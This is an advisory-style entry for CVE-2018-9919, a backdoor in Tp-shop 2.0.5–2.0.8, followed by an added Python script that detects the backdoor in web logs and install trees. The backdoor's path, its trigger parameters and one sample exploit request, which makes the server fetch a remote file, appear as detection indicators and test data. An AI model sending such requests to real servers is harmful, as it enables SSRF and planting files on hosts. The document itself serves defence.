CVE-2018-9919 in Tp-shop

Summary

by MITRE

A web-accessible backdoor, with resultant SSRF, exists in Tp-shop 2.0.5 through 2.0.8, which allows remote attackers to obtain sensitive information, attack intranet hosts, or possibly trigger remote command execution, because /vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php writes data from the "down_url" URL into the "bddlj" local file if the attacker knows the backdoor "jmmy" parameter.


Analysis

by VulDB Data Team • 02/02/2020

CVE-2018-9919 is a critical security flaw in Tp-shop versions 2.0.5 through 2.0.8: a web-accessible backdoor. The backdoor is a file reachable over HTTP that combines insecure file handling with server-side request forgery, letting a remote attacker steer the application's behaviour. It sits in the vendored phpDocumentor reflection-docblock test directory and fetches an external URL without any validation or sanitization, which makes it exploitable remotely.

Technically, the backdoor is the PHP file /vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php, which accepts attacker-controlled data through the "down_url" parameter. The file retrieves the URL given in that parameter and writes the retrieved content directly to a local file named "bddlj", with no verification of the source or of the content. The write is only performed when the request also carries the backdoor parameter "jmmy", which acts as the key that unlocks the functionality.

The impact goes beyond information disclosure to possible remote command execution. Because the backdoor makes the server fetch an arbitrary URL, an attacker can use it for server-side request forgery against internal hosts that are not reachable from the internet: scanning internal systems and potentially reaching databases, internal services or other infrastructure components that are not directly exposed. In effect, the backdoor is a gateway for internal network reconnaissance and exploitation.

The weakness classes are CWE-20 (improper input validation) and CWE-918 (server-side request forgery). In ATT&CK terms the vulnerability maps to T1105 (Ingress Tool Transfer) and T1059 (Command and Scripting Interpreter), since an attacker can pull malicious files onto the host and execute commands on it. The backdoor also relates to T1078 (Valid Accounts) and T1566 (Phishing), as it provides a persistent access mechanism that can be used to establish a long-term presence in the target network.

Affected organizations should patch immediately to a version beyond 2.0.8, where the backdoor has been removed or secured. Network segmentation should limit what a compromised host can reach, and the web application firewall should block requests carrying suspicious parameters such as "down_url" and "jmmy". Regular security scanning should look for unauthorized modifications to the affected application components, and access controls should ensure that only authorized personnel can modify critical application files. The case illustrates why input validation and secure file handling matter: without them, an attacker can steer application behaviour through crafted external input.
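The following script is an added example, not VulDB's or Tp-shop's code, showing how the two indicators given above can be checked from the defender's side: it flags web-server access-log entries that reach the backdoor path or carry the "jmmy"/"down_url" parameters, and it lists files in a deployment tree that match the backdoor file or the dropped "bddlj" file. It assumes Apache/nginx "combined" log format; the sample log lines are constructed for illustration and the IP addresses are documentation ranges.

```python
"""Defensive checks for the CVE-2018-9919 Tp-shop backdoor (added example).

Indicators taken from the advisory:
  1. HTTP requests to the planted file LinkTagTeet.php, or requests carrying
     the backdoor parameters "jmmy" / "down_url".
  2. Presence of that file, or of the dropped file "bddlj", in an install tree.
"""
import re
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

BACKDOOR_PATH = ("/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/"
                 "Reflection/DocBlock/Tag/LinkTagTeet.php")
BACKDOOR_PARAMS = {"jmmy", "down_url"}
DROPPED_FILE = "bddlj"

# Apache/nginx "combined" format (assumed):
# ip - - [time] "METHOD target HTTP/x" status size "referer" "user-agent"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def classify_request(line):
    """Return a dict describing why a log line is suspicious, or None."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query, keep_blank_values=True)
    hit_params = sorted(BACKDOOR_PARAMS.intersection(params))
    hit_path = parts.path == BACKDOOR_PATH
    if not (hit_path or hit_params):
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "path": parts.path,
        "backdoor_path": hit_path,
        "params": hit_params,
        # the URL the server would be made to fetch (SSRF target), if any
        "down_url": params.get("down_url", [None])[0],
        "status": int(m.group("status")),
    }


def scan_log(lines):
    """Run classify_request over an iterable of log lines, keeping the hits."""
    return [hit for hit in (classify_request(line) for line in lines) if hit]


def indicator_hits(relative_paths):
    """Return the relative paths that match the advisory's file indicators."""
    hits = []
    for rel in relative_paths:
        rel = rel.replace("\\", "/").lstrip("/")
        if rel == BACKDOOR_PATH.lstrip("/") or rel.rsplit("/", 1)[-1] == DROPPED_FILE:
            hits.append(rel)
    return sorted(hits)


def scan_tree(root):
    """Walk a Tp-shop install at `root` and return matching indicator files."""
    root = Path(root)
    return indicator_hits(str(p.relative_to(root)) for p in root.rglob("*") if p.is_file())


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/May/2018:10:14:03 +0000] "GET /index.php/Home/Index/index HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/May/2018:10:14:09 +0000] "GET ' + BACKDOOR_PATH +
    '?jmmy=1&down_url=http://192.0.2.10/f.txt HTTP/1.1" 200 12 "-" "curl/7.58.0"',
    '198.51.100.4 - - [02/May/2018:10:15:00 +0000] "GET /index.php?down_url=http://example.invalid/x '
    'HTTP/1.1" 404 210 "-" "python-requests/2.18"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(indicator_hits(["index.php", BACKDOOR_PATH, "runtime/bddlj"]))
```

Running `scan_log` over a real access log gives you the source addresses and the fetched URLs, so a hit with a `down_url` pointing at an internal address is direct evidence of the SSRF use described above; `scan_tree` pointed at the web root gives the file-level confirmation to accompany the WAF rule and the patch.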

Reservation

04/10/2018

Disclosure

05/02/2018

Moderation

accepted

CPE

ready

EPSS

0.04704

KEV

no

Activities

very low
